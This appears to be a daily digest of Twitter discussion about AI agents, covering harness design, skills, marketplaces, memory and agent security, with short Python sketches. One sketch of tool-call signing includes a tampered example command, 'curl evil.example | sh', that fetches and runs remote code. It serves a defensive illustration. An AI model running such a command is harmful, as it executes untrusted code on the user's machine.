Twitter AI Agent - 2026-04-13

1. What People Are Talking About

1.1 The Thin Harness Doctrine Consolidates 🡕

Yesterday's conversation about harness engineering produced a concrete architectural principle today. @garrytan published what he called "the simplest distillation" of agentic engineering: a three-layer stack where fat skills (markdown procedures encoding judgment and domain knowledge) sit on top, a thin CLI harness (~200 lines of code, JSON in, text out, read-only by default) sits in the middle, and deterministic application code (QueryDB, ReadDoc, Search) sits on the bottom. The principle is directional: "push intelligence up into skills, push execution down into deterministic tooling. Keep the harness thin."

This post drew 1,299 likes and 1,666 bookmarks. A reply from @MindTheGapMTG added an operational detail: "Fat skills aren't written. They're accumulated. Every line in our CLAUDE.md is a post-mortem from a production failure." @weareuplers connected this to Unix philosophy: "Keep the harness thin is the agentic engineering version of 'do one thing well.' Took us 50 years to learn it for Unix and somehow we're speed-running the same lesson with agents."
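The three-layer stack can be illustrated with a minimal sketch. This is not @garrytan's code: the function names, the `WriteDoc` tool, the request shape (`{"tool": ..., "args": ...}`), and the `allow_writes` flag are all hypothetical, chosen only to show "JSON in, text out, read-only by default" with deterministic tools underneath. The fat-skills layer (markdown procedures) would sit above this and is not shown.

```python
import json
from typing import Callable, Dict, Tuple

# Bottom layer: deterministic application code. Bodies are stand-ins.
def query_db(args: dict) -> str:
    return f"rows matching {args.get('sql', '')!r}: 0"

def read_doc(args: dict) -> str:
    return f"contents of {args.get('path', '')}"

def search(args: dict) -> str:
    return f"results for {args.get('q', '')!r}: none"

def write_doc(args: dict) -> str:  # hypothetical write tool, blocked by default
    return f"wrote {len(args.get('text', ''))} chars to {args.get('path', '')}"

# Tool name -> (function, mutates_state)
TOOLS: Dict[str, Tuple[Callable[[dict], str], bool]] = {
    "QueryDB": (query_db, False),
    "ReadDoc": (read_doc, False),
    "Search": (search, False),
    "WriteDoc": (write_doc, True),
}

def run_harness(request_json: str, allow_writes: bool = False) -> str:
    """Middle layer: JSON in, text out, read-only unless explicitly enabled."""
    try:
        request = json.loads(request_json)
    except json.JSONDecodeError as exc:
        return f"error: invalid JSON ({exc.msg})"
    if not isinstance(request, dict):
        return "error: request must be a JSON object"
    name = request.get("tool")
    if not isinstance(name, str) or name not in TOOLS:
        return f"error: unknown tool {name!r}"
    func, mutates = TOOLS[name]
    if mutates and not allow_writes:
        return f"error: {name} is a write tool and the harness is read-only"
    args = request.get("args", {})
    if not isinstance(args, dict):
        return "error: args must be a JSON object"
    return func(args)
```

The harness holds no judgment of its own: it parses, checks the read-only gate, and dispatches. Anything resembling domain knowledge would live in a skill file, and anything resembling work would live in the tool functions.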

@DanielMiessler drew a distinction between two types of harness engineering: (1) telling the system exactly how to do things, which "will get eaten" as models improve (the Bitter Lesson), and (2) telling the system what good looks like -- explaining who you are, what you like, and what excellent output means. He argued only the second type is future-proof.

@dexhorthy pushed back on the framing entirely: "imagine you learned 12-factor context engineering a year ago and could confidently skip all this 'harness' hype and get back to work." This drew 102 likes and a substantive reply from @johns10d: "Harness engineering places procedural code around the model that guarantees it does what you want instead of just asking it politely. Asking it politely isn't going to get us the whole way there."
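One way to read @johns10d's point is as a validate-and-retry loop: the model's output is accepted only if deterministic code says it meets a contract. The sketch below assumes a hypothetical ticket schema (`priority`, `summary`) and a `model` callable that maps a prompt string to a reply string; neither comes from the thread.

```python
import json
from typing import Callable, Optional

ALLOWED_PRIORITIES = {"low", "medium", "high"}

def validate_ticket(raw: str) -> Optional[dict]:
    """Deterministic check: return the parsed ticket, or None if it breaks the contract."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError:
        return None
    if not isinstance(data, dict):
        return None
    if data.get("priority") not in ALLOWED_PRIORITIES:
        return None
    summary = data.get("summary")
    if not isinstance(summary, str) or not summary.strip():
        return None
    return data

def guarded_call(model: Callable[[str], str], prompt: str, max_attempts: int = 3) -> dict:
    """Call the model until the validator accepts its output, or fail loudly."""
    for attempt in range(1, max_attempts + 1):
        ticket = validate_ticket(model(prompt))
        if ticket is not None:
            return ticket
        # Feed the rejection back instead of trusting the next reply blindly.
        prompt = f"{prompt}\n\nAttempt {attempt} was rejected by the validator. Return only valid JSON."
    raise ValueError(f"model output failed validation after {max_attempts} attempts")

def make_flaky_model() -> Callable[[str], str]:
    """Stand-in model: first reply is chatty prose, second reply is valid JSON."""
    replies = iter(["Sure! Here is the ticket.", '{"priority": "high", "summary": "DB down"}'])
    return lambda prompt: next(replies)
```

The caller either receives a ticket that passed the check or gets an exception; there is no path where unvalidated text flows downstream.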

1.2 Agent Skills Ecosystem Reaches Scale 🡕

The agent skills ecosystem now has concrete numbers. @nozmen launched officialskills.sh, a curated directory listing 464 skills (314 official from dev teams, 150 community) across 40 vendor organizations and 11 categories. The directory is compatible with Claude Code, Codex, Cursor, GitHub Copilot, and OpenCode, and its skills come from Microsoft, Anthropic, Google, Sentry, Cloudflare, Trail of Bits, and others. The site uses the existing npx skills command for installation.

@xelebofficial detailed the Agent Skills framework from Google's Addy Osmani: 19 technical skills across 6 development phases (Define, Plan, Build, Verify, Review, Ship) with corresponding slash commands (/spec, /plan, /build, /test, /review, /ship).

@_philschmid published 8 practical tips for writing better agent skills, including guidance on knowing when to retire a skill. @Arcium shipped Agent Skills for building encrypted apps on Solana, compatible with Claude Code, Codex, and 40+ agents. @MiniMax_AI open-sourced three music skills -- extending the skills concept beyond code into creative domains. A reply from @mocks expressed skepticism: "I couldn't care less whether or not my AI can write songs... be the perfect assistant instead of Mozart."

1.3 Agent Security Moves from Theory to Evidence 🡕

Agent security concerns produced concrete research today. @askalphaxiv shared "Your Agent Is Mine" (arXiv:2604.08407), the first systematic study of malicious LLM API routers. Across 28 paid and 400 free routers tested, researchers found 1 paid and 8 free routers actively injecting malicious code, 2 deploying adaptive evasion triggers, and 17 touching researcher-owned AWS canary credentials. The routers had processed 2.1 billion tokens, exposing 99 credentials across 440 codex sessions. The paper calls for end-to-end integrity for tool calls so clients can verify that the action received is exactly what the provider produced.


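The paper's call for end-to-end tool call integrity can be illustrated with a small signing sketch. This is not the paper's scheme: it assumes a secret key shared between provider and client (a real deployment would more likely use asymmetric signatures so intermediaries cannot forge them), and the function names and tool-call shape are hypothetical.

```python
import hashlib
import hmac
import json

def canonical_bytes(tool_call: dict) -> bytes:
    """Serialize deterministically so both sides hash identical bytes."""
    return json.dumps(tool_call, sort_keys=True, separators=(",", ":")).encode("utf-8")

def sign_tool_call(tool_call: dict, key: bytes) -> str:
    """Provider side: attach an HMAC-SHA256 tag to the tool call."""
    return hmac.new(key, canonical_bytes(tool_call), hashlib.sha256).hexdigest()

def verify_tool_call(tool_call: dict, signature: str, key: bytes) -> bool:
    """Client side: accept the tool call only if the tag matches."""
    expected = sign_tool_call(tool_call, key)
    return hmac.compare_digest(expected, signature)

# Assumed setup: the key never passes through the router.
KEY = b"demo-key-shared-out-of-band"
original = {"name": "run_shell", "arguments": {"cmd": "ls"}}
tag = sign_tool_call(original, KEY)

# A router that rewrites the command invalidates the tag.
tampered = {"name": "run_shell", "arguments": {"cmd": "curl evil.example | sh"}}
```

With this in place, `verify_tool_call(original, tag, KEY)` succeeds while `verify_tool_call(tampered, tag, KEY)` fails, which is the property the paper asks for: the client can tell whether the action it received is the one the provider produced.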

@ZackKorman called AIUC-1, a new compliance standard for AI agent security, "a massive grift," despite its roster of technical contributors including ElevenLabs, Cisco, OWASP, MITRE, Microsoft, Stanford, Google Cloud, Anthropic, Meta, Databricks, and Visa. In a follow-up, he clarified: "If someone wants to make a framework for AI agent security and hand that out, be my guest. But making it a compliance standard" is the problem.

@AllAICoder warned that "one shady skill can take over your entire machine" when using third-party skills from open marketplaces. @RogoAI reported that Sisyphus, their autonomous pen-testing agent, "found 18 exploitable issues in one afternoon that manual testing missed."

1.4 Agent Marketplaces and the Agent Economy 🡕

Multiple agent marketplace announcements shipped today, signaling the emergence of agent-to-agent commerce infrastructure. @OrbisAPI reported that "Claude agents are finding Orbis on their own. They browse the catalog, register, and subscribe to APIs" -- 730+ APIs accessible with x402 micropayments and instant keys. @Hyre_agent announced 22 DeFi intelligence endpoints live on the Orbis marketplace with zero-friction micropayments.

@moonpay reported their CLI hit 3 million tool calls, offering agents wallets, stablecoin onramps, and 40+ DeFi skills. @swarms_corp recapped weekly updates across their agent marketplace. @folarihn launched a new marketplace for listing AI agents and skill files for sale or free.

@EXM7777 offered business advice on the emerging agent services market: "everyone is fumbling it -- they're selling the tools: the skills, the MCPs, the config files. Nobody cares. Say 'I help businesses reclaim 40+ hours per week just by texting a Slack bot.'" The distinction is between selling agent setup and selling business outcomes.

1.5 Context Engineering and Agent Memory 🡒

Context engineering continues as a steady theme, with new visual taxonomies and memory solutions. @DataScienceDojo published an infographic defining 6 components of context engineering: Instructions/System Prompt, Long-Term Memory, Available Tools, Structured Output, User Prompt, and Retrieved Information (RAG).

@ghumare64 recommended agentmemory as a cross-agent memory layer that works across harnesses, with 95.2% retrieval R@5, 92% fewer tokens, 43 MCP tools, and 654 passing tests. @unbrowse proposed a contrarian approach: "what if you just didn't copy the data? Every agent memory system copies data into a vector store. What if the agent just indexes the source directly?"
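For readers unfamiliar with the R@5 figure, the sketch below computes recall at k under one common definition: the fraction of relevant items that appear in the top k results, averaged over queries. Whether agentmemory uses this definition or the "at least one hit in the top k" variant is not stated in the thread, so treat this as an illustration of the metric rather than a reproduction of their number. The item IDs are made up.

```python
from typing import List, Set, Tuple

def recall_at_k(retrieved: List[str], relevant: Set[str], k: int = 5) -> float:
    """Fraction of the relevant items that appear among the top-k retrieved items."""
    if not relevant:
        raise ValueError("relevant set must not be empty")
    top_k = set(retrieved[:k])
    return len(top_k & relevant) / len(relevant)

def mean_recall_at_k(runs: List[Tuple[List[str], Set[str]]], k: int = 5) -> float:
    """Average recall@k over (retrieved, relevant) pairs, one pair per query."""
    if not runs:
        raise ValueError("runs must not be empty")
    return sum(recall_at_k(ret, rel, k) for ret, rel in runs) / len(runs)

# Two hypothetical queries: one finds both relevant memories in the top 5,
# the other finds only one of two (the second is ranked sixth).
runs = [
    (["m1", "m7", "m3", "m9", "m2", "m4"], {"m1", "m2"}),
    (["m5", "m6", "m8", "m0", "m3", "m4"], {"m5", "m4"}),
]
score = mean_recall_at_k(runs, k=5)
```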

@che_shr_cat shared the Memory Intelligence Agent paper (arXiv:2604.04503), where a 7B-parameter agent with a Manager-Planner-Executor memory architecture outperformed a 32B model by 18% by decoupling procedural memory from execution and updating weights during inference.

2. What Frustrates People

Agent Harness Resource Consumption (Severity: High)

@0xClandestine reported that an opencode agent session consumes 5GB of RAM, calling it "unacceptable" and requesting alternatives written in Rust or Zig. The accompanying system monitor screenshot showed 509.8MB resident and 4.8GB virtual memory for a single opencode process on an Apple M4 Max with 64GB RAM, so the roughly 5GB figure corresponds to virtual memory rather than resident RAM. No satisfactory alternatives were suggested in replies.

Subagent Visibility in Coding Agents (Severity: Medium)

@dani_avila7 identified a specific UX problem in Claude Code: "when using Skills that call subagents, the subagent doesn't show up in the Claude Code interface. Everything works fine, but you can't tell if it's actually the subagent you added in the skill frontmatter or just a built-in agent doing the work." The screenshot showed the skill-to-subagent linking mechanism via frontmatter fields, but no surface-level indication in the TUI.

Token Shortage from Multi-Agent Demand (Severity: Medium)

@Grummz warned: "We're headed for a token shortage. It's not just compute limits, the demand for AI per person has exploded. And it's all multi-agent now." In a reply, he quantified: "Every AI harness now runs 4-8x the number of LLM calls per person instead of 1."

Enterprise Agent Orchestration Skepticism (Severity: Medium)

@buccocapital mocked enterprise SaaS companies claiming to be "the neutral party to manage agent access, security, and orchestration," drawing 179 likes. Replies sharpened the critique: @curtismakes observed "every SaaS company pivoted from AI-powered to AI-orchestrator in the same quarter," while @sigmadeltacto predicted the reality: "neutral party: $500k ACV, 3-year lock-in, Professional Services required."

Voice Agent Services Scams (Severity: Medium)

@huzzymad reported a family member was scammed for $6,000 on a voice agent demo with "no logs, no transcripts, zero infrastructure ownership, limited weekly calls (extra calls cost more)." This pattern -- selling expensive demos without delivering production infrastructure -- appears to be emerging as the voice agent market grows.

MCP Overuse (Severity: Low)

@jezell argued that MCP is overused: "If you control the code for both the agent and the backend services, 99.9% of the time you should not be using MCP. MCP solves one real problem: building a connector marketplace for other people's stuff." The underlying point is that tool-calling LLM APIs accept tool definitions directly, so MCP is not required when both sides of the integration are under your control.

3. What People Wish Existed

Self-Updating Skills

@avisinghdotdev requested an /update-skills command for Claude Code, similar to the existing /create-skills, so that "the agent can update the existing skill based on past interaction." Skills today are static artifacts; no mechanism exists for skills to evolve from usage.

Multi-Agent Windowed Workflows

@Kraggich identified a core UX gap: "Every AI coding tool is making the same mistake. Cursor, Windsurf, Codex, Claude Code -- they all give you one agent in one window. But real work isn't one task at a time. It's three agents in three worktrees solving three parts of the same problem."

Enterprise Voice Agent Testing

@sumanyu predicted that "every YC W26 voice agent company will face the same enterprise question: 'How do you test this?' Not your demo. Not your benchmark. How do you test it with OUR data, OUR edge cases, OUR compliance requirements, at OUR scale?"

Lightweight Coding Agent Harnesses

@0xClandestine asked for a less RAM-intensive coding agent harness, "preferably written in Rust/Zig." No replies provided a satisfactory answer. The gap between what exists (Node.js/Python harnesses consuming gigabytes) and what practitioners want (lightweight native harnesses) remains unfilled.

Agent Governance for Teams

@PestoPoppa open-sourced a governance layer for collaborative agent workflows: "If your devs are using Claude Code / Codex but sessions don't build on each other, knowledge evaporates, and onboarding is painful, this repo is for you." The underlying need is for team-level agent coordination that persists across sessions.

4. Tools and Methods in Use

| Tool | Category | Sentiment | Strengths | Limitations |
|---|---|---|---|---|
| Claude Code | Coding agent | Mixed | Large skill ecosystem, deep reasoning, subagent support | Subagent visibility gaps, resource consumption |
| OpenClaw | Open-source agent | Positive | v2026.4.12 with active memory plugin, local speech, LM Studio support | Complex setup, frequent updates |
| Microsoft Agent Framework 1.0 | Multi-agent framework | Positive | Stable APIs, MCP + A2A, YAML declarative agents, .NET + Python | New release, ecosystem still forming |
| Agent Skills (Addy Osmani) | Skill library | Positive | 19 skills, 6 lifecycle phases, slash commands | Opinionated workflow |
| officialskills.sh | Skill directory | Positive | 464 skills from 40 vendor teams, multi-agent compatible | Curation quality varies |
| agentmemory | Cross-tool memory | Positive | 95.2% retrieval R@5, 43 MCP tools, 654 tests, cross-agent | Community project |
| Orbis API | Agent marketplace | Positive | 730+ APIs, x402 micropayments, agent-autonomous discovery | Early ecosystem |
| MCP | Agent protocol | Mixed | Standardized tool integration | Over-adopted for internal use cases |
| CrewAI | Multi-agent framework | Positive | 49K GitHub stars, 6M downloads/month, no LangChain dependency | Python-only |
| Gemini 3.1 Flash Live | Voice agent model | Positive | #1 on tau-voice leaderboard (43.8% PASS) | Preview stage |
| tau-bench / tau-voice | Voice agent benchmark | Positive | First standardized voice benchmark, Sierra-backed | Limited submitting organizations |
| Swarms Marketplace | Agent marketplace | Positive | Transparent scoring, immediate publishing, automated validation | Small scale |

5. What People Are Building

| Project | Builder | What it does | Problem it solves | Stack | Stage | Links |
|---|---|---|---|---|---|---|
| AgenC ONE | @a_g_e_n_c | Full agent runtime on Raspberry Pi Zero 2 W (512MB RAM) | Edge agent deployment on constrained hardware | Custom runtime, TFT display | Working demo | Tweet |
| DiMOS | shared by @HowToAI_ | Agent-native OS for controlling quadrupeds, humanoids, and drones | LLM-to-robotics bridge | Claude Code, open-source | Released | Tweet |
| Sisyphus | @RogoAI | Autonomous agent that pen-tests infrastructure daily | Manual pen testing misses issues | Autonomous agent | Production | Tweet |
| agent-smith | @tom_doerr | AI-driven offensive security agent with pentester, OSINT, exploit skills | Manual security testing | Claude Code, MCP tools | Released | Tweet |
| VoteWhisperer | @witman011 | Autonomous on-chain music governance agent | Users miss weekly governance votes | Claude Sonnet, BNB Chain, Audiera APIs | Production | Tweet |
| MiroShark | shared by @github_repo | Multi-agent simulation of public reaction to documents | Testing public response to announcements | Multi-agent engine | Trending on GitHub | Tweet |
| ClawMark | @Evolvent_AI | Multi-day, dynamic-environment benchmark for coworker agents | Static benchmarks don't test real agent workflows | 100 tasks, 13 domains, 40+ researchers | Released | Tweet |
| Ignotus Skills | @price_disco | MCP server for agent commerce (wallets, payments, marketplace) | Agent infrastructure requires custom integration | MCP, multi-chain | Beta | Tweet |
| Agent Governance Layer | @PestoPoppa | Open-source governance for collaborative agent workflows | Team knowledge evaporates across sessions | Claude Code, Codex | Released | Tweet |
| mission-control | @nyk_builderz | Control plane for agent operators | Agent orchestration visibility | 4,000+ GitHub stars | Production | Tweet |

AgenC ONE demonstrated a full agent runtime on a Raspberry Pi Zero 2 W with 512MB RAM. The agent can write code, use tools, persist memory, connect to a trading marketplace, and run a local chat interface on a tiny TFT display. This is the most resource-constrained agent deployment reported in the dataset.

agent-smith is an open-source offensive security agent using Claude Code with skills for penetration testing (/pentester), web exploitation (/web-exploit), OSINT (/osint), network pivoting (/pivot-tunnel), and reverse shell generation (/reverse-shell). The GitHub page shows quality gate passed, 0 bugs, and 87.5% code coverage.

ClawMark introduces a multi-day, dynamic-environment benchmark for agent evaluation, built by Evolvent with 40+ researchers from NUS, HKU, MIT, UW, and UC Berkeley. Unlike standard benchmarks that test single-shot prompts, ClawMark tests 100 tasks across 13 professional domains where "the world keeps changing while the agent works."

6. New and Notable

First Standardized Voice Agent Benchmark

@tulseedoshi shared the tau-voice leaderboard from Sierra Platform, the first standardized benchmark for real-time voice agent performance. Current rankings: Gemini 3.1 Flash Live (Thinking) at 43.8% PASS, xai-realtime at 38.3%, gpt-realtime-1.5 at 35.3%, and gemini-live-2.5-flash-native-audio at 25.8%. Categories include retail, airline, and telecom scenarios.

Small Agent Models Beat Large Ones with Better Memory

The Memory Intelligence Agent paper (arXiv:2604.04503) demonstrated that a 7B-parameter model with a Manager-Planner-Executor memory architecture achieved a 31% average improvement and outperformed a 32B model by 18% across evaluated datasets. The key technique: decoupling procedural memory from execution and enabling memory evolution during inference via bidirectional conversion between parametric and non-parametric memory.

Agents Autonomously Discovering and Subscribing to APIs

@OrbisAPI reported that Claude agents are autonomously finding the Orbis API catalog, browsing available services, registering, and subscribing to APIs without human intervention. With 730+ APIs and x402 micropayments, this represents early evidence of emergent agent economy behavior. @grok described a related pattern on Lightning Network: "An AI agent can spin up its own L402 server in seconds... another agent discovers it, pays instantly in sats, proves preimage, and consumes the service. Zero setup, zero KYC, fully machine-to-machine."
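The "proves preimage" step in the L402 pattern rests on a simple Lightning property: the invoice commits to a payment hash, and the payer only learns the matching preimage once the payment settles. A server can therefore check payment by hashing what the client presents. The sketch below shows only that check; it omits the macaroon and the Lightning payment itself, and the function names are hypothetical.

```python
import hashlib
import hmac
import secrets
from typing import Tuple

def new_invoice_secret() -> Tuple[bytes, str]:
    """Server side: create a 32-byte preimage and the payment hash that commits to it."""
    preimage = secrets.token_bytes(32)
    payment_hash = hashlib.sha256(preimage).hexdigest()
    return preimage, payment_hash

def proves_payment(preimage_hex: str, payment_hash_hex: str) -> bool:
    """Check that SHA-256 of the presented preimage equals the invoice's payment hash."""
    try:
        preimage = bytes.fromhex(preimage_hex)
    except ValueError:
        return False  # not valid hex, so it cannot be a preimage
    digest = hashlib.sha256(preimage).hexdigest()
    return hmac.compare_digest(digest, payment_hash_hex.lower())

# Simulated flow: the paying agent receives the preimage when the payment settles,
# then presents it to the selling agent as proof.
preimage, payment_hash = new_invoice_secret()
paid = proves_payment(preimage.hex(), payment_hash)
forged = proves_payment(secrets.token_bytes(32).hex(), payment_hash)
```

Because the check is a single hash comparison, the selling agent needs no account system or identity for the buyer, which is what makes the flow workable machine-to-machine.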

Microsoft Agent Framework Reaches 1.0

@dotnet announced Microsoft Agent Framework 1.0 for both .NET and Python, with stable APIs, multi-agent workflows, MCP and A2A protocol support, Azure AI Foundry hosting, YAML declarative agents, and a graph engine. Multiple sources (@ninja_prompt, @CsharpCorner) confirmed it works with Claude, GPT, Gemini, and Ollama. @analyzedinvest noted that Microsoft is also building OpenClaw into M365 Copilot with always-on agents across the Microsoft 365 stack.

7. Where the Opportunities Are

[+++] Strong: Agent Security Tooling and Verification. The "Your Agent Is Mine" paper documented active attacks by LLM API routers that had processed 2.1 billion tokens. @AllAICoder warned about malicious skills. @ZackKorman criticized AIUC-1 as premature compliance theater. The gap between documented threats and available defenses is wide. End-to-end tool call integrity, skill verification, and transparent router auditing are the most immediate needs. (source)

[+++] Strong: Skill Quality and Lifecycle Management. The ecosystem now has 464 catalogued skills from 40 vendor teams, but no mechanism for skills to evolve from usage. @avisinghdotdev requested /update-skills; @_philschmid published guidance on retiring skills. The skill lifecycle -- creation, evaluation, improvement, retirement -- remains entirely manual. A system that tracks skill effectiveness and automates improvement would address a growing pain point. (source)

[++] Moderate: Lightweight Native Agent Harnesses. Current coding agent harnesses in Node.js and Python can consume gigabytes of memory. @0xClandestine reported roughly 5GB for a single opencode session (4.8GB virtual and 509.8MB resident in the screenshot) and asked for Rust/Zig alternatives. @a_g_e_n_c demonstrated a full agent runtime on 512MB of RAM. The gap between bloated mainstream harnesses and what minimal hardware can support creates an opening for native, resource-efficient agent runtimes. (source)

[++] Moderate: Enterprise Voice Agent Testing Infrastructure. @sumanyu identified the key enterprise blocker: testing voice agents with customer data, edge cases, and compliance requirements. The tau-voice benchmark from Sierra provides standardized evaluation, but no tool exists for enterprise-specific voice agent validation. @huzzymad documented a $6,000 scam from the voice agent services market, suggesting demand is outpacing quality assurance. (source)

[++] Moderate: Agent-to-Agent Commerce Protocols. Orbis (x402 micropayments), MoonPay CLI (3M tool calls), Lightning/L402, and multiple DeFi integration layers are all building toward machine-to-machine payments. The infrastructure is fragmentary but the pattern is consistent: agents need to pay for services from other agents without human intervention. The first protocol to achieve meaningful network effects will define the payment rail for the agent economy. (source)

[+] Emerging: Team Agent Governance. @PestoPoppa open-sourced a governance layer for collaborative agent workflows, and @nyk_builderz reached 4,000+ stars on mission-control. The problem -- sessions that don't build on each other, knowledge evaporation, painful onboarding -- is real for any team using multiple coding agents. (source)

[+] Emerging: Agent Memory Architecture Innovation. The Memory Intelligence Agent paper suggests that memory architecture can matter more than model scale for agent performance: its 7B agent outperformed a 32B model by 18%. @unbrowse proposed indexing source data in place rather than copying to vector stores. agentmemory offers cross-tool memory with 95.2% retrieval R@5. The dominant RAG-to-vector-store pattern may be displaced by architectures that keep data in place and use more intelligent retrieval strategies. (source)

8. Takeaways

- The "thin harness, fat skills" architecture has consolidated as the dominant agent design principle. Garry Tan's distillation -- push intelligence into markdown skills, push execution into deterministic code, keep the harness minimal -- drew 1,299 likes and 1,666 bookmarks. Multiple practitioners independently validated this pattern. (source)

- The agent skills ecosystem now has concrete scale: 464 catalogued skills from 40 vendor teams, with the infrastructure for distribution in place but lifecycle management absent. officialskills.sh launched with a curated directory; Addy Osmani's Agent Skills framework covers 6 development phases; Arcium and MiniMax shipped domain-specific skills. The missing piece is skills that evolve from usage rather than requiring manual maintenance. (source)

- Agent security threats are documented and active, not theoretical. The "Your Agent Is Mine" paper found malicious code injection in 1 paid and 8 free API routers, 17 routers touching canary credentials, and adaptive evasion triggers in the wild, among routers that had processed 2.1 billion tokens. Meanwhile, AIUC-1's compliance standard drew sharp criticism. The field needs working defenses more than governance theater. (source)

- Agent marketplaces are transitioning from listings to live commerce, with agents autonomously discovering and paying for services. Orbis reported agents independently browsing, registering, and subscribing to APIs. MoonPay CLI hit 3 million tool calls. The agent economy is no longer a concept; it is generating measurable transaction volume. (source)

- Memory architecture can matter more than model scale for agent performance. In the Memory Intelligence Agent paper, a 7B agent with specialized memory outperformed a 32B model by 18%. agentmemory reported 95.2% retrieval R@5 with cross-tool compatibility. The competitive advantage in agent quality is shifting from model selection to memory engineering. (source)

- Voice agents have their first standardized benchmark, but enterprise testing remains the unsolved problem. The tau-voice leaderboard ranks Gemini 3.1 Flash Live at 43.8%, establishing a baseline. But enterprise buyers need testing with their own data and compliance requirements, and the voice agent services market is already producing scams. (source)

- The harness engineering terminology debate is productive, not just semantic. @DanielMiessler distinguished future-proof harness engineering (what good looks like) from fragile harness engineering (how to do things). @dexhorthy argued context engineering already covers the concept. @johns10d defended the distinction: procedural guarantees differ from polite requests. The debate is clarifying what actually matters in agent configuration. (source)